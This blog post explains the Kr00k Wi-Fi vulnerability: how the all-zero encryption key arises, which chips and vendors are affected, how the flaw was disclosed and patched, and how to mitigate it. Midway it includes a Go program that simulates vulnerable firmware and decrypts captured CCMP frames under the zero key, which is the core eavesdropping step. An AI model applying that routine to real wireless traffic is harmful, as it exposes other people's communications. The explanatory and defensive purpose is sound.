Thursday, February 27, 2020

What do You Get When You Cross a Protocol Vulnerability with a Wifi Chip? Vol 9 rel 5

A vulnerability in WiFi chips made by Cypress Semiconductor and Broadcom left billions of devices susceptible to an attack that allowed nearby attackers to decrypt sensitive data sent over the air.

The security flaw was detailed at the RSA security conference yesterday (via Ars Technica), and for Apple users, the issue was addressed in the iOS 13.2 and macOS 10.15.1 updates that were released back in late October.

Dubbed Kr00k, the WiFi chip flaw caused vulnerable devices to use an all-zero encryption key to encrypt part of a user's communications. If exploited successfully, the attack let an attacker within radio range decrypt some of the wireless packets sent by a vulnerable device. As described by Ars Technica:

Kr00k – formally known as CVE-2019-15126 – is a vulnerability in Broadcom and Cypress Wi-Fi chips that allows unauthorized decryption of some WPA2-encrypted traffic.

Kr00k exploits a weakness that occurs when wireless devices disassociate from a wireless access point. If either the end-user device or the access point is vulnerable, it will put any unsent data frames into a transmit buffer and then send them over the air. Rather than encrypt this data with the session key negotiated earlier and used during the normal connection, vulnerable devices use a key consisting of all zeros, a move that makes decryption trivial.

Which Wi-Fi chips exactly were vulnerable?

According to ESET Research, the vulnerability affects Wi-Fi chips used in devices from many vendors, so patching involves both the chip manufacturers (Broadcom and Cypress) and the device manufacturers. ESET responsibly disclosed the vulnerability to Broadcom and Cypress, which subsequently released patches to the individual device manufacturers.

Furthermore, to expand the scope of its responsible disclosure, ESET has worked with ICASI (the Industry Consortium for Advancement of Security on the Internet) to ensure that all possibly affected device manufacturers are aware of Kr00k.

Who is affected?

The vulnerability affects all unpatched devices with Broadcom and Cypress FullMAC Wi-Fi chips, that is, chips that run the 802.11 MAC layer in their own firmware rather than in the host's driver. These are the most common Wi-Fi chips used in today's client devices, made by well-known manufacturers including Amazon (Echo, Kindle), Apple (iPhone, iPad, MacBook), Google (Nexus), Samsung (Galaxy) as well as devices under many other brands.

Wi-Fi access points and routers are also affected by Kr00k, so an environment with fully patched client devices is still exposed if its access point flushes its own transmit buffer under the zero key. All in all, before patching there were more than a billion affected devices.

Who Isn't Affected?

"We have also tested some devices with Wi-Fi chips from other manufacturers, including Qualcomm, Realtek, Ralink, Mediatek and did not see the vulnerability manifest itself," said ESET.

Even though the flaw lies within the Wi-Fi chips themselves, the researchers say it can be fixed in software. Such a fix would ensure that the chip's transmit buffer is not flushed over the air after a disassociation or a key change, but discarded instead. These controllers contain embedded CPU cores running firmware that directs their operation, and that firmware can be updated so it no longer transmits queued frames once the session key has been cleared to zero.
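The two code paths just described, and the decryption step from the Ars Technica excerpt above, as an added example in Go written for this page (it is not ESET's, Ars Technica's or any chip vendor's code). The chip side is a constructed model: on disassociation it wipes the temporal key (TK) to all zeros and then either flushes its transmit buffer under that zero key (the Kr00k behaviour) or discards it (the fix). The eavesdropper side implements the CCMP construction that WPA2 uses for data frames (AES-CCM with an 8-byte MIC, a nonce built from the transmitter address and the packet number, and the masked frame header as additional authenticated data) and tries every captured frame with the all-zero key: a MIC that verifies under that key is a leaked frame. The MAC addresses, the key, the payloads and the names `send`, `Disassociate` and `Kr00kCheck` are assumptions made for the example; QoS priority, A4 and fragmentation are left out of the nonce and AAD, and nothing here models real chip firmware.

```go
package main

import (
	"crypto/aes"
	"crypto/subtle"
	"encoding/binary"
	"fmt"
)

const micLen = 8 // CCMP is AES-CCM with an 8-octet MIC, a 13-octet nonce and a 2-octet length
func pad16(b []byte) []byte   { return append(b, make([]byte, (16-len(b)%16)%16)...) }
func xorInto(dst, src []byte) { for i := range src { dst[i] ^= src[i] } }

// Frame is what an eavesdropper captures: cleartext header fields plus Body = ciphertext || MIC.
type Frame struct {
	FC         [2]byte
	A1, A2, A3 [6]byte
	PN         uint64 // 48-bit packet number carried in the CCMP header
	Body       []byte
}

var sta, ap = [6]byte{2, 0, 0, 0, 0, 1}, [6]byte{2, 0, 0, 0, 0, 2} // constructed MAC addresses

// nonceAAD builds the CCMP nonce (priority octet, 0 for non-QoS || A2 || PN big-endian) and the
// AAD (FC with subtype/retry/pwr-mgmt/more-data masked and Protected set || A1 || A2 || A3 ||
// sequence control with the sequence number masked, leaving fragment number 0 here).
func (f Frame) nonceAAD() (nonce, aad []byte) {
	var pn [8]byte
	binary.BigEndian.PutUint64(pn[:], f.PN)
	nonce = append(append([]byte{0}, f.A2[:]...), pn[2:]...)
	aad = []byte{f.FC[0] & 0x8f, (f.FC[1] & 0xc7) | 0x40}
	aad = append(append(append(aad, f.A1[:]...), f.A2[:]...), f.A3[:]...)
	return nonce, append(aad, 0, 0)
}

// ccm is AES-CCM (RFC 3610, M=8, L=2) for frame f: it XORs in with the keystream and returns
// the masked tag over the plaintext (the input when sealing, the output when opening).
func ccm(tk [16]byte, f Frame, in []byte, sealing bool) (out, tag []byte) {
	blk, _ := aes.NewCipher(tk[:])
	nonce, aad := f.nonceAAD()
	// Counter blocks A_i = 0x01 || nonce || i: S_0 masks the tag, S_1.. encrypt the payload.
	ks := make([]byte, 16*(1+(len(in)+15)/16))
	for i := 0; i < len(ks)/16; i++ {
		blk.Encrypt(ks[16*i:], append(append([]byte{0x01}, nonce...), byte(i>>8), byte(i)))
	}
	out = append([]byte{}, in...)
	xorInto(out, ks[16:16+len(in)])
	plain := in
	if !sealing {
		plain = out
	}
	// CBC-MAC over B0 (flags 0x59: Adata, M=8, L=2) || len(aad) || aad || plain, zero padded.
	b0 := append(append([]byte{0x59}, nonce...), byte(len(plain)>>8), byte(len(plain)))
	data := append(b0, pad16(append([]byte{byte(len(aad) >> 8), byte(len(aad))}, aad...))...)
	data = append(data, pad16(append([]byte{}, plain...))...)
	x := make([]byte, 16)
	for i := 0; i < len(data); i += 16 {
		xorInto(x, data[i:i+16])
		blk.Encrypt(x, x)
	}
	xorInto(x, ks[:micLen])
	return out, x[:micLen]
}

// ccmpOpen decrypts f under tk and returns the payload only if the MIC verifies.
func ccmpOpen(tk [16]byte, f Frame) ([]byte, bool) {
	n := len(f.Body) - micLen
	if n < 0 {
		return nil, false
	}
	plain, tag := ccm(tk, f, f.Body[:n], false)
	if subtle.ConstantTimeCompare(tag, f.Body[n:]) != 1 {
		return nil, false
	}
	return plain, true
}

// send models the chip's transmit path: a protected data frame with PN pn from sta to ap, sealed under tk.
func send(tk [16]byte, pn uint64, payload []byte) Frame {
	f := Frame{FC: [2]byte{0x08, 0x41}, A1: ap, A2: sta, A3: ap, PN: pn}
	ct, tag := ccm(tk, f, payload, true)
	f.Body = append(ct, tag...)
	return f
}

// Disassociate models the transmit buffer on disassociation. Affected chips wipe the TK to all
// zeros first; Kr00k firmware then flushes the buffer under that key, fixed firmware discards it.
func Disassociate(pn uint64, queue [][]byte, vulnerable bool) (air []Frame) {
	for i := 0; vulnerable && i < len(queue); i++ { // fixed path: nothing leaves the chip
		air = append(air, send([16]byte{}, pn+uint64(i)+1, queue[i])) // Kr00k path: zero TK
	}
	return air
}

// Kr00kCheck is the eavesdropper's test: a frame that verifies under the all-zero TK leaks its payload.
func Kr00kCheck(f Frame) ([]byte, bool) { return ccmpOpen([16]byte{}, f) }
func main() {
	leaked := Disassociate(7, [][]byte{[]byte("Cookie: session=constructed-token")}, true)
	p, ok := Kr00kCheck(leaked[0])
	fmt.Printf("PN %d: zero-key MIC ok=%v payload=%q\n", leaked[0].PN, ok, p)
}
```

Run as-is, the flushed frame decrypts under the zero key and its cookie comes back in the clear; a frame sent under the real TK fails the MIC in `Kr00kCheck`, which is exactly the test a capture tool applies to every CCMP data frame seen around a disassociation. Note the check only identifies leaked frames; whether anything sensitive is inside them depends on what the higher layers had queued at that moment.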

How do I know if I’m still vulnerable to Kr00k?

Make sure you have updated all your Wi-Fi capable devices, including phones, tablets, laptops, and Wi-Fi access points and routers, to the latest operating system, software and/or firmware versions. According to ESET's information, patches for devices by major manufacturers have been released by now.

To address Kr00k, therefore, users and admins should look out for driver or firmware updates for affected devices, ESET says. ESET seems confident fixes are available, though your mileage may vary: the supply chain from Broadcom and Cypress to manufacturers of Internet-of-Things devices and other wireless-enabled equipment, and on to end users, can be long and winding, and there are plenty of places for a firmware update to snag and never see the light of day.

In the meantime, encrypt as much network traffic as possible, especially over Wi-Fi, using HTTPS, SSH, VPNs, and so on, so that if your network-level encryption is broken you are still protected at the application layer. Kr00k recovers only what the Wi-Fi layer encrypted: payloads that are themselves encrypted (TLS, SSH, VPN tunnels) stay unreadable, but cleartext protocols such as plain HTTP or unencrypted DNS in a leaked frame are exposed.

Released patches:

ESET notes that it does not have a comprehensive overview of when all these vendors released software updates (due to the large number of vendors), but it is aware of the following:

iOS 13.2 and iPadOS 13.2 - October 28, 2019
macOS Catalina 10.15.1, Security Update 2019-001, and Security Update 2019-006 - October 29, 2019

Inquiries as to whether your devices with affected chips have been patched, or whether your device uses the affected chips in the first place, should be directed at your device manufacturer.



So “Once more unto the breach, dear friends, once more;”
____________________________________________________________
About Rick Ricker

An IT professional with over 23 years' experience in Information Security, wireless broadband, network and Infrastructure design, development, and support.
For more information, contact Rick at rwricker@gmail.com


Thanks for your input, your ideas, critiques, suggestions are always welcome...

- Wasabi Roll Staff